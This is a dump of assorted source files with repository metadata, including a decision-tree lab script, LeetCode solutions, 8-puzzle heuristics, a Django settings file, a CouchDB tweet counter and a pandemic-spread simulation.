attribute 属性list,包含字典{属性名称:取值}
eg:[{'色泽': ['浅白', '青绿', '乌黑']}, {'根蒂': ['蜷缩', '硬挺', '稍蜷']}]
"""
filename = 'E:\\Study\\Term5\\Merchine Learning\\Lab\\Lab02\\xigua2.0.csv'
data = pd.read_excel(filename)
# 7行17列的矩阵,第一行为色泽,第二行为根蒂,
# 第三行为敲声,第四行为纹理,第五行为脐部,第柳行为触感
x = [list(data[u'色泽']), list(data[u'根蒂']),
list(data[u'敲声']), list(data[u'纹理']),
list(data[u'脐部']), list(data[u'触感'])]
# 1行17列,好瓜结果,1为好瓜,0为坏瓜
y = list(data[u'好瓜'])
# 属性:取值
attribute = []
attribute_name = ['色泽','根蒂','敲声','纹理','脐部','触感']
for i in range(len(x)):
label = set(x[i])
lable_list = list(label)
dic = {}
dic[attribute_name[i]] = lable_list
attribute.append(dic)
return x,y,attribute
if __name__ == "__main__":
x,y,attribute = load_dataset()
# ans = Create_Decision_Tree(x,y,attribute,method='id3')
# ans = Create_Decision_Tree(x,y,attribute,method='c4.5')
ans = Create_Decision_Tree(x,y,attribute,method='cart')
create_plot(ans)
print(json.dumps(ans, ensure_ascii=False))
# 模型存储为json文件
# StoreTree(ans,'E:\\Study\\Term5\\Merchine Learning\\Lab\\Lab02\\tree_id3.json')
# StoreTree(ans,'E:\\Study\\Term5\\Merchine Learning\\Lab\\Lab02\\tree_c4.5.json')
# StoreTree(ans,'C:\\Users\\49393\\Desktop\\ML_pre\\实验2.1-屈湘钧-20186471-2018计科卓越\\tree_cart.json')
testAns = dtClassify(ans,['色泽','根蒂','敲声','纹理','脐部','触感'], x)
print("y:",y)
count = 0 # 正确率
print("test:",testAns)
for i in range(len(y)):
if(y[i] == testAns[i]):
count += 1
print("正确率:%.2f"%(count/len(y)*100.0))
|
[
"quxiangjun@cqu.edu.cn"
] |
quxiangjun@cqu.edu.cn
|
75b146e4891ac523f6d062a2009e4a423e15e259
|
f1e1424ff858b8c636e0bcf412541fd5153cd4d6
|
/Check if Array Is Sorted and Rotated.py
|
bfbfc45db647a120a915ccf7a30dabe2e1ef9941
|
[] |
no_license
|
soma-y1029/TechCodingPractices
|
223d81eb74bfa72b6a946f8027418b8fd056d131
|
cd207dd30ecc23baa9ee014191c38b9ca277d80c
|
refs/heads/master
| 2023-04-02T22:33:27.405753
| 2021-04-06T23:29:14
| 2021-04-06T23:29:14
| 306,386,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 558
|
py
|
class Solution:
def check(self, nums: List[int]) -> bool:
if len(nums) < 2: return True
prev = nums[0]
for i, n in enumerate(nums[1:]):
if n < prev: # found place of rotation
# print(n, i+1, prev, nums)
nums = nums[i+1:] + nums[:i+1]
break
prev = n
# check sorted
# print(nums)
prev = nums[0]
for n in nums[1:]:
if prev > n: # not sorted
return False
prev = n
return True
|
[
"noreply@github.com"
] |
soma-y1029.noreply@github.com
|
41afd3843af692eb3adb2cfaff20ea5a4e0e7638
|
bf98767ab26c0eed492a4e9817cfcb799ff6b18e
|
/Search/eight_puzzle/heuristics.py
|
8bf6e56e0292acdc5d8f76d06bfc2842e58512b0
|
[] |
no_license
|
surbhi-145/ArtificialIntelligence
|
f291065340ea46f7859be22ae2e207d64591169f
|
785d5faa14a1fc10c9bf412a570718f0cf3a07ab
|
refs/heads/master
| 2022-12-11T07:15:14.947365
| 2020-08-31T06:37:31
| 2020-08-31T06:37:31
| 287,737,029
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,477
|
py
|
'''
Heuristic Functions :
- Manhattan Distance
- No. of Misplaced tiles
- Sqrt of Manhattan Distance
- Max Heuristic max(Manhattan Distance , No. of Misplaced tiles)
'''
import math
def linear(node):
goal = (1, 2, 3, 4, 5, 6, 7, 8, 0)
return sum([1 if node.state[i] != goal[i] else 0 for i in range(8)])
def manhattan(node):
state = node.state
index_goal = {0: [2, 2], 1: [0, 0], 2: [0, 1], 3: [0, 2], 4: [1, 0], 5: [1, 1], 6: [1, 2], 7: [2, 0], 8: [2, 1]}
index_state = {}
index = [[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [2, 0], [2, 1], [2, 2]]
x, y = 0, 0
for i in range(len(state)):
index_state[state[i]] = index[i]
mhd = 0
for i in range(8):
for j in range(2):
mhd = abs(index_goal[i][j] - index_state[i][j]) + mhd
return mhd
def sqrt_manhattan(node):
state = node.state
index_goal = {0: [2, 2], 1: [0, 0], 2: [0, 1], 3: [0, 2], 4: [1, 0], 5: [1, 1], 6: [1, 2], 7: [2, 0], 8: [2, 1]}
index_state = {}
index = [[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [2, 0], [2, 1], [2, 2]]
x, y = 0, 0
for i in range(len(state)):
index_state[state[i]] = index[i]
mhd = 0
for i in range(8):
for j in range(2):
mhd = (index_goal[i][j] - index_state[i][j]) ** 2 + mhd
return math.sqrt(mhd)
def max_heuristic(node):
score1 = manhattan(node)
score2 = linear(node)
return max(score1, score2)
|
[
"surbhi89.agrawal@gmail.com"
] |
surbhi89.agrawal@gmail.com
|
b49fc24bb43a8a5b1a38eda3db1d1a457f3601fb
|
f401345413420583ca01a2723f66182b3007b76a
|
/bin/python-config
|
16aa730a16e62feacf787e63cf6aedc9ab940946
|
[] |
no_license
|
irslambouf/SyncServer
|
92208cbb00a067aa68348dddacbdde56c41eee1f
|
293c1fef7b65cf84a600c100b23654896e159836
|
refs/heads/master
| 2021-01-21T15:37:12.963847
| 2016-05-18T17:36:33
| 2016-05-18T17:36:33
| 59,137,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,344
|
#!/home/philippe/server-full/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
|
[
"irslambouf"
] |
irslambouf
|
|
663b39c9a6e21e392ce1a27d195c48aa3e3d88bf
|
192b6b54e0408c00a828072db624ac2f52cb444d
|
/Delete_Node_in_list.py
|
ab806f7cb9c0063706ff50b3fc34114b00a1ff49
|
[] |
no_license
|
yaserahmedn/Leetcode--June-Challenge
|
b0c517de90e974a7d017ba0f984bda83011bf37e
|
4397bde1c99f7322ab30cf3eb691ab293af5316e
|
refs/heads/master
| 2022-10-14T09:06:41.398577
| 2020-06-12T11:58:44
| 2020-06-12T11:58:44
| 268,815,665
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 976
|
py
|
'''
Delete Node in a Linked List
Write a function to delete a node (except the tail) in a singly linked list, given only access to that node.
Given linked list -- head = [4,5,1,9], which looks like following:
Example 1:
Input: head = [4,5,1,9], node = 5
Output: [4,1,9]
Explanation: You are given the second node with value 5, the linked list should become 4 -> 1 -> 9 after calling your function.
Example 2:
Input: head = [4,5,1,9], node = 1
Output: [4,5,9]
Explanation: You are given the third node with value 1, the linked list should become 4 -> 5 -> 9 after calling your function.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def deleteNode(self, node):
"""
:type node: ListNode
:rtype: void Do not return anything, modify node in-place instead.
"""
node.val=node.next.val
node.next=node.next.next
|
[
"noreply@github.com"
] |
yaserahmedn.noreply@github.com
|
6e2d3ce0a7edcf543768df76534c06980026ae6d
|
2d82cc5ed46d067f840a8679fc054e5ca0cdd3d3
|
/CODE/Data_Process/Primary_Model/Tweets_Count/Football_italy/italyTweetsCount/OlimpicoRoma.py
|
9058d4d02881d751516336f31718b06035c48fcb
|
[] |
no_license
|
chenvega/COMP90055-COMPUTING-PROJECT-Estimating-Crowds-Based-on-Social-Media
|
ec5e89171994af39188480b8596b0faf7c38a86d
|
7220ed2873729e24827ddf9d0325e7b4c488ff0b
|
refs/heads/master
| 2021-01-10T13:37:06.602347
| 2015-11-03T06:00:06
| 2015-11-03T06:00:15
| 45,310,395
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,078
|
py
|
# Author : Weijia Chen
# Student Number : 616213
# Supervisor : Prof. Richard Sinnott
# Subject: COMP90055 COMPUTING PROJECT
# Project Name : Estimating Crowds Based on Social Media
# This program will count individual number attending one specific
# football match on a corresponding stadium
import couchdb
from couchdb import Server
couch = couchdb.Server('http://localhost:5984')
db = couch['italy']
mapFunc = '''function(doc) {
var a = new Date(Date.parse("Sun Oct 04 00:00:00 +0000 2015"));
var b = new Date(Date.parse("Mon Oct 05 00:00:00 +0000 2015"));
var t = new Date(Date.parse(doc.created_at));
var locations = [12.429343,41.915356,12.480278,41.953303]
if((t>a)&&(t<b)){
if(doc.coordinates != null){
var la = doc.coordinates.coordinates[1];
var lo = doc.coordinates.coordinates[0];
if((lo>locations[0])&&(la>locations[1])&&(lo<locations[2])&&(la<locations[3])){
emit(doc.user.id, 1);
}
}
}
}
'''
reduceFunc = '''function(keys, values,rereduce){
return sum(values);
}'''
result = db.query(mapFunc, reduceFunc, group_level=1)
print len(result)
|
[
"260435413@qq.com"
] |
260435413@qq.com
|
8096da5763075f0b5a0f0373871c0b99d7e55b14
|
5aae5a7ebd03700c122b6e9f7063573e5dc72821
|
/accounts/urls.py
|
be60bca649f8b2fa24d441cae7d925d8359fef81
|
[] |
no_license
|
sandrayousry/djangoLabs
|
e28ab486be010a488812d0a07ab9185a5c21887f
|
d1cad66eaddb8ed6dad99d07b683331829a8c619
|
refs/heads/main
| 2023-03-20T02:55:36.006566
| 2021-03-15T22:29:54
| 2021-03-15T22:29:54
| 347,519,327
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 155
|
py
|
from django.urls import path
# from .views import signup
from . import views
urlpatterns = [
path('signup',views.signup,name="signup"),
]
|
[
"noreply@github.com"
] |
sandrayousry.noreply@github.com
|
8b5cb30d0f2eb905dd9fa8439b1d4bac24e708ae
|
2d4bc7e7c24a918cfe959f37fb759ec3b92c1674
|
/course9/sqlalchemy_example/models.py
|
0b0fb3eea5ce9b8a06002e3958e25e4a64f4585d
|
[] |
no_license
|
zx089/tceh-python
|
a3884e2ded0681a4344c9d32969a78bc4a48df58
|
7589c6f960f2a387c6ef10078f18452743608dc2
|
refs/heads/master
| 2020-05-30T12:55:13.355695
| 2016-04-15T16:20:19
| 2016-04-15T16:20:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,406
|
py
|
# -*- coding: utf-8 -*-
from datetime import date
from app import db
__author__ = 'sobolevn'
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120), unique=True)
def __init__(self, username, email):
self.username = username
self.email = email
def __repr__(self):
return '<User %r>' % self.username
def __str__(self):
return repr(self)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), )
# # index=True) # now let's test it.
user = db.relationship(
'User', backref=db.backref('posts', lazy='dynamic')
)
title = db.Column(db.String(140), unique=True)
content = db.Column(db.String(3000))
# sub_title = db.Column(db.String(140), unique=True)
date_created = db.Column(db.Date, default=date.today())
is_visible = db.Column(db.Boolean, default=True)
def __init__(self, title='', content='', user=None,
date_created=None, is_visible=None):
self.title = title
self.content = content
self.user = user
if date_created is not None:
self.date_created = date_created
if is_visible is not None:
self.is_visible = is_visible
|
[
"mail@sobolevn.me"
] |
mail@sobolevn.me
|
5cf18deede105b09c6d5140b3cc9b5e325e0f2c5
|
6df0d7a677129e9b325d4fdb4bbf72d512dd08b2
|
/Django/ttscase/djvenv/bin/pip
|
1d6258f3f720b9ca0981b0c6c8615694541fafbb
|
[] |
no_license
|
yingxingtianxia/python
|
01265a37136f2ad73fdd142f72d70f7c962e0241
|
3e1a7617a4b6552bce4a7e15a182f30e1bae221e
|
refs/heads/master
| 2021-06-14T15:48:00.939472
| 2019-12-13T05:57:36
| 2019-12-13T05:57:36
| 152,200,507
| 0
| 0
| null | 2021-06-10T20:54:26
| 2018-10-09T06:40:10
|
Python
|
UTF-8
|
Python
| false
| false
| 236
|
#!/data/python/Django/ttscase/djvenv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"root@room8pc205.tedu.cn"
] |
root@room8pc205.tedu.cn
|
|
2ef43e5b57b8f8c20be85e594f3601e5fc4baca0
|
160e0880cc9926e916e3e4295bebeca2e7f45312
|
/lambda/ExchangeMessages.py
|
3a4046c3afed83b63f56fdad78e23f7966f9ab6f
|
[] |
no_license
|
cherudim9/DiningConciergeVirtualAssistant
|
000be94c3121e5f0901916965941ecf9409e2494
|
999646ac718094078ae1835faf6a823c4fdfe0ac
|
refs/heads/master
| 2020-03-09T04:38:16.594755
| 2018-04-08T03:11:30
| 2018-04-08T03:11:30
| 128,592,084
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
from __future__ import print_function
import json
import boto3
def lambda_handler(event, context):
data = json.loads(json.dumps(event))
message = data["message"]
userid = data["userId"]
client = boto3.client('lex-runtime')
response = client.post_content(
botName='Testbot',
botAlias = 'chatbot',
userId = userid,
contentType = 'text/plain; charset=utf-8',
inputStream = message,
accept = "text/plain; charset=utf-8"
)
return response['message']
|
[
"cherudim9@gmail.com"
] |
cherudim9@gmail.com
|
d27f53becd30cb01565191e28b3ce9b5bfe45935
|
6659c6f8ef75b98b4fe99e1ff54c22d2c052f44c
|
/app1/admin.py
|
0e88744bf5993b00b446dc44bd7c1ee958df8433
|
[] |
no_license
|
vizul2012/bookstore
|
0b2bbeca8f3eae436017bb125b669498009f5662
|
12c1abc92859efb933422aee3d9594a60ed5d00c
|
refs/heads/master
| 2023-06-09T10:03:00.154938
| 2021-06-26T09:45:17
| 2021-06-26T09:45:17
| 380,463,135
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 112
|
py
|
from django.contrib import admin
from .models import *
# Register your models here
admin.site.register(seller)
|
[
"vizulsuthar1999@gmail.com"
] |
vizulsuthar1999@gmail.com
|
9c330392ee7280a8342cecca64e8c9cc46db19cc
|
e071c0290fbb7a48d1b6ebb04691d378a01c80ff
|
/ex16-1.py
|
109beef186f5fb82c108ff17c7a22d0cebd2c992
|
[] |
no_license
|
dillonius01/LPTHW
|
d6ab9743b108cf10dff0fe850dee4b83828be5a7
|
3250f0fef4f3dbf29d09d81d90fbb58a7b9ba021
|
refs/heads/master
| 2020-04-06T06:55:18.717087
| 2016-08-18T15:28:13
| 2016-08-18T15:28:13
| 48,221,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 277
|
py
|
#print "What file would you like to open?"
#filename = raw_input("> ")
#txt = open(filename)
#print "Press RETURN to see the file contents"
#raw_input("> ")
#print txt.read()
from sys import argv
script, filename = argv
txt = open(filename)
print txt.read()
txt.close()
|
[
"dillon.c.powers@gmail.com"
] |
dillon.c.powers@gmail.com
|
49d8e34ba81fb8c503497a2be5ab77f389891bb6
|
c8924684677eec757425fec3b063353cac1675a3
|
/app/config/settings.py
|
4941df16b7a532a3233210301f6b8068c9414459
|
[] |
no_license
|
Fastcampus-WPS-7th/Celery-Tutorial
|
0dc34262ea0e1717df1575f2bc648af35b6f37a2
|
66f9dd009e3492941c2fe889d6a656d1dbd4f9c3
|
refs/heads/master
| 2020-03-07T08:42:28.002826
| 2018-03-30T06:45:59
| 2018-03-30T06:45:59
| 127,386,257
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,220
|
py
|
"""
Django settings for config project.
Generated by 'django-admin startproject' using Django 2.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CELERY_BROKER_URL = 'redis://localhost:6379/0'
CELERY_RESULT_BACKEND = 'redis://localhost:6379/0'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'dq1j-z+=6xk#+yj%*8yb^krbnomj9kmv*fdph0k+7)*tj==@9f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"dev@azelf.com"
] |
dev@azelf.com
|
2162026b3b76bf6d2721005cbcb0d68b8d08e474
|
c3f0a636a2f14a02e5f2ff4afea438195f64ecf6
|
/scratch/sub-pop_algorithm_playground.py
|
958287a1e8fa9fd8e76c9801d082f4661b477697
|
[] |
no_license
|
sdodd92/pandemic-sim
|
d6caabb43ff5f08920c41809bd3c0e636062c148
|
0bc8a1edd94c8d2be163239715dd1fcc30b4eabf
|
refs/heads/master
| 2021-04-21T14:06:10.734117
| 2020-10-02T15:32:23
| 2020-10-02T15:32:23
| 249,785,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,523
|
py
|
import numpy as np
import seaborn as sns
import pandas as pd
# np.random.seed(5)
class Network:
def __init__(self, raw_network: dict):
self.raw_network = raw_network
def as_table(self):
output = pd.DataFrame(columns=['Source', 'Target', 'weight'])
for node_from in self.raw_network.keys():
for node_to in self.raw_network[node_from].keys():
weight = self.raw_network[node_from][node_to]
if weight > 0:
output = output.append(pd.DataFrame({'Source': [node_from], 'Target': [node_to], 'weight': [weight]}))
return output
class Person:
uid = 0
@classmethod
def inc_uid(cls):
cls.uid += 1
def __init__(self):
self.uuid = self.uid
self.inc_uid()
self.immune = False
self.infected = False
self.alive = True
def __eq__(self, other):
if isinstance(other, Person):
return self.uuid == other.uuid
else:
return other == self
def __ne__(self, other):
if isinstance(other, Person):
return self.uuid != other.uuid
else:
return other != self
def get_disease(self, interactee):
if interactee.infected:
self.infected = True
class Community:
def __init__(self, sociability, pop_size: int=None):
self.population = []
self.pop_uids = []
self.sociability = sociability
self.pop_size = 0
if pop_size:
self.pop_size = pop_size
for i in range(pop_size):
self.add_person(Person())
def interact(self, i, j):
self.population[i].get_disease(self.population[j])
def mingle(self):
pop_size = len(self.population)
for i in range(pop_size):
if self.sociability <= 0:
interactions = pop_size
else:
interactions = int(np.random.poisson(self.sociability, 1))
for interaction in range(interactions):
j = np.random.randint(0, pop_size - 1)
while j == i:
j = np.random.randint(0, pop_size - 1)
self.interact(i, j)
def add_person(self, new_person: Person=None):
if new_person is None:
new_person = Person()
if new_person.uuid in self.pop_uids:
return False
else:
self.population.append(new_person)
self.pop_uids.append(new_person.uuid)
return True
def remove_person(self, member_index: int):
del self.population[member_index]
def kill(self, kill_prob: float):
for person in self.population:
if np.random.uniform() < kill_prob:
person.alive = False
def count_dead(self):
return sum([not person.alive for person in self.population])
class Border:
@staticmethod
def share(country_a: Community, country_b: Community, member_index: int=None):
if member_index is None:
member_index = np.random.randint(0, country_a.pop_size - 1)
result = country_b.add_person(country_a.population[member_index])
return result
def __init__(self, country_a: Community, country_b: Community):
self.country_a = country_a
self.country_b = country_b
def exchange(self, member_index=None):
member_index = self.share(self.country_a, self.country_b, member_index)
self.country_a.remove_person(member_index)
class SubCommunity(Community):
"""
special case of the population specifically designed as a sub-community within a larger nation.
In this case, all members interact with all other members with certain (equal) probability
"""
def __init__(self, interactiveness: float, pop_size: int=None):
super().__init__(-1, pop_size)
self.interactiveness = interactiveness
self.active = {i: True for i in range(pop_size)}
def mingle(self):
pop_size = len(self.population)
for i in range(pop_size):
for j in range(pop_size):
# determine if the alternate interaction selection logic is actually necessary...
if i != j and self.active[i] and self.active[j] and np.random.uniform() < self.interactiveness: # room for algorithm optimization here
self.interact(i, j)
def inactivate(self, id: int):
self.active[id] = False
def reactivate(self, id: int):
self.active[id] = True
class SuperCommunity(Community):
def __init__(self, pop_size: int, clumpiness: float):
super().__init__(0, pop_size) # generate "master population" as normal
# split into sub-communities
un_clumped = pop_size # count how much of the population has not yet been allocated
avg_community_size = int(pop_size * clumpiness)
subcommunities = []
clumped_pop = []
while len(clumped_pop) < pop_size: # do until the entire population has been allocated
community_size = np.random.poisson(avg_community_size, 1)[0] # as a naive method draw pop size from poisson (this is dumb and should be changed)
new_community = Community(0) # initialize the new community with 100% interaction
for n in range(community_size): # populate the community
success = False
while not success: # re-draw if the person has already been allocated in that community
i = np.random.randint(0, pop_size, 1)[0]
success = Border.share(self, new_community, i)
# END while not success
if i not in clumped_pop:
clumped_pop.append(i)
un_clumped -= 1 # increment the allocation counter after successful allocation
# END for n in range(community_size)
# after allocating all members, solidify the community and move on to the next one
subcommunities.append(new_community)
print(len(clumped_pop), end='\r')
# END while un_clumped > 0
self.subcommunities = subcommunities
self.clumped_pop = clumped_pop
def get_network(self):
network = {}
for node_from in self.pop_uids:
network[node_from] = {}
for node_to in self.pop_uids:
if node_to not in network:
network[node_from][node_to] = 0
for community in self.subcommunities:
uids = community.pop_uids
if node_from in uids and node_to in uids:
network[node_from][node_to] += 1
return Network(network)
def mingle(self):
for subpop in self.subcommunities:
subpop.mingle()
class CommunityNetwork(Community):
def __init__(self, pop_size: int):
super().__init__(0, pop_size) # generate un-allocated overall population pool
network = {}
# iteratively draw connections between players
for person_1 in self.pop_uids:
network[person_1] = {}
for person_2 in self.pop_uids:
network[person_1][person_2] = np.random.uniform()
self.interaction_network = network
def mingle(self):
for i, source in self.interaction_network.items():
for j, weight in source.items():
if np.random.uniform() < weight:
self.interact(i, j)
def get_network(self):
return Network(self.interaction_network)
nation_test = SuperCommunity(100, .05)
print(sum([len(sub.population) for sub in nation_test.subcommunities]))
print(sum([len(np.unique([member.uuid for member in sub.population])) for sub in nation_test.subcommunities]))
sizes = [len(np.unique([member.uuid for member in sub.population])) for sub in nation_test.subcommunities]
sns.distplot(sizes)
memberships = []
for uid in nation_test.pop_uids:
membership = 0
for subcommunity in nation_test.subcommunities:
if uid in subcommunity.pop_uids:
membership += 1
memberships.append(membership)
sns.distplot(memberships)
nation_test.kill(.2)
deaths = [sub.count_dead() for sub in nation_test.subcommunities]
sns.distplot(deaths)
len(np.unique(nation_test.clumped_pop))
"""
network_table = Network(nation_test.get_network()).as_table()
network_table.to_csv('/home/sam/Documents/pandemic-sim/debug/pop-network.csv', index=False)
"""
|
[
"dodd429@gmail.com"
] |
dodd429@gmail.com
|
42fa495715d823a9db8a693de3ca18f53ba9d129
|
ee8c4c954b7c1711899b6d2527bdb12b5c79c9be
|
/assessment2/amazon/run/core/controllers/tidy.py
|
a98e9c5baa8c3bcdb82a407edf341a643292ba3c
|
[] |
no_license
|
sqlconsult/byte
|
02ac9899aebea4475614969b594bfe2992ffe29a
|
548f6cb5038e927b54adca29caf02c981fdcecfc
|
refs/heads/master
| 2021-01-25T14:45:42.120220
| 2018-08-11T23:45:31
| 2018-08-11T23:45:31
| 117,135,069
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
#!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
controller = Blueprint('tidy', __name__, url_prefix='/tidy')
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
# if title == 'Republic': # TODO 2
# return render_template('republic.html') # TODO 2
# else:
# pass
|
[
"sqlconsult@hotmail.com"
] |
sqlconsult@hotmail.com
|
864e0d13bb575384b5cef4c8125abecb6c3dc9f4
|
96f3c029e79f3997b97b30912b45886790a155bc
|
/chapter-10/employee_class.py
|
3b8ae81217016774122ef9fe2dcc0d654522d699
|
[] |
no_license
|
Techwrekfix/Starting-out-with-python
|
ba32dff77a3360d004fa82a6dc4b62b1648022af
|
6adb490daf5085f08e08c9eb847c84cfce89330e
|
refs/heads/master
| 2020-06-02T18:52:32.064755
| 2018-12-20T16:10:33
| 2018-12-20T16:10:33
| 191,272,861
| 1
| 0
| null | 2019-06-11T01:43:38
| 2019-06-11T01:43:38
| null |
UTF-8
|
Python
| false
| false
| 1,074
|
py
|
#This module is an Employee class
class Employee:
#Initializing the data attributes
def __init__(self,name,ID_number,department,job_title):
self.__name = name
self.__ID_number = ID_number
self.__department = department
self.__job_title = job_title
def set_name(self,name):
self.__name = name
def set_ID_number(self,ID_number):
self.__ID_number = ID_number
def set_department(self,department):
self.__department = department
def set_job_title(self,job_title):
self.__job_title = job_title
def get_name(self):
return self.__name
def get_ID_number(self):
return self.__ID_number
def get_department(self):
return self.__department
def get_job_title(self):
return self.__job_title
def __str__(self):
return 'Name: ' + self.__name +\
'\nID_Number: ' + self.__ID_number +\
'\nDepartment: ' + self.__department +\
'\nJob Title: ' + self.__job_title
|
[
"kwabena4140@gmail.com"
] |
kwabena4140@gmail.com
|
f464f5c4280a093bbe8deed632c851d2ba4a6c53
|
392870585863452cd9c5e5bcddc0866193b7e67b
|
/getapp/admin.py
|
84b57793f16fb0a06daffccf26dd7738b446c375
|
[] |
no_license
|
Adelice/Get-It
|
684c097ff6895829e6d4b2e1b69c7ea9f3454b0c
|
ddc4f9739814e5a3951f8361a5550251e9c0c9ff
|
refs/heads/master
| 2020-05-17T02:02:24.266686
| 2019-05-02T15:14:51
| 2019-05-02T15:14:51
| 183,243,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 199
|
py
|
from django.contrib import admin
from .models import Store,Product
# admin.site.register(Product, ProductAdmin)
admin.site.register(Store)
admin.site.register(Product)
# Register your models here.
|
[
"nancytoniw@gmail.com"
] |
nancytoniw@gmail.com
|
9d3c56c8feb382a952c59f61e914adf8e7b237d3
|
4c976067eea83d1b1afb1b17b5308955c5b92256
|
/colleges/migrations/0006_auto_20201126_2259.py
|
573bc17246409a697cc8c5e45a3a1d01ade9622b
|
[] |
no_license
|
rafiqnazir/ecopy4u
|
556bda8c01c52cf101f7d776859228ff7769f5de
|
4d9ed43bd977491e6adabb2b1afe657f12dbeb01
|
refs/heads/main
| 2023-03-08T10:53:42.716120
| 2021-02-23T10:22:25
| 2021-02-23T10:22:25
| 318,174,197
